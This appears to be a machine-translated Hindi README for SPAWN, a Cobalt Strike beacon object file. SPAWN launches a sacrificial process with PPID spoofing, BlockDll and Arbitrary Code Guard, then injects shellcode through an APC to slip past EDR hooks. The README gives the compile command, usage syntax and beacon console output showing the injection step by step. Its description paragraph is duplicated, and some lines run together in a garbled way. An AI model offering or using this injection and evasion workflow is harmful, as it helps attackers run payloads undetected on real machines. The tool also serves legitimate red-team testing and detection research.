
Cobalt Strike BOF जो एक बलिदान प्रक्रिया (sacrificial process) उत्पन्न करता है, उसमें शेलकोड इंजेक्ट करता है, और पेलोड निष्पादित करता है। EDR/UserLand हुक्स से बचने के लिए बनाया गया है, जिसमें बलिदान प्रक्रिया को Arbitrary Code Guard (ACG), BlockDll, और PPID स्पूफिंग के साथ उत्पन्न किया जाता है।
Cobalt Strike BOF जो एक बलि प्रक्रिया (sacrificial process) को जन्म देता है, उसमें शेलकोड इंजेक्ट करता है, और पेलोड निष्पादित करता है। EDR/UserLand हुक्स से बचने के लिए Arbitrary Code Guard (ACG), BlockDll, और PPID स्पूफिंग के साथ बलि प्रक्रिया को जन्म देकर बनाया गया है।

beacon> spawn notepad.exe 6248 /Users/bobby.cooke/git/boku7/SPAWN/popCalc.bin
[*] SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
[+] Opened handle 0x534 to process 6248(PID)
[+] Spawned process: notepad.exe | PID: 8404 | PPID: 6248
[+] Allocated RE memory in remote process 8404 (PID) at: 0x00000177A72C0000
[+] Wrote 280 bytes to memory in remote process 8404 (PID) at 0x00000177A72C0000
[+] APC queued for main thread of 8404 (PID) to shellcode address 0x00000177A72C0000
beacon> help
spawn Spawn a process with a spoofed PPID and blockDll
beacon> help spawn
Synopsis: spawn /path/to/exe PPID
beacon> ps
8264 5536 OneDrive.exe x86 1 DESKTOP-KOSR2NO\boku
beacon> spawn cmd.exe 8264
[*] SPAWN (@0xBoku|github.com/boku7)
Opened handle 0x634 to process 8264(PID)
Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264
blockdll कार्यक्षमताx86_64-w64-mingw32-gcc -c spawn.x64.c -o spawn.x64.o
beacon> spawn /path/to/exe PPID /local/path/to/shellcode.bin

cmd.exe प्रक्रिया को PPID के रूप में OneDrive.exe के साथ जन्म दिया जा रहा हैblockdll कार्यक्षमता को लागू करना
Signatures restricted (Microsoft only) के साथ बनाई गई हैSignatures restricted (Microsoft only) यह सुनिश्चित करता है कि Microsoft द्वारा हस्ताक्षरित नहीं किए गए DLL हमारी उत्पन्न प्रक्रिया में लोड नहीं किए जा सकते
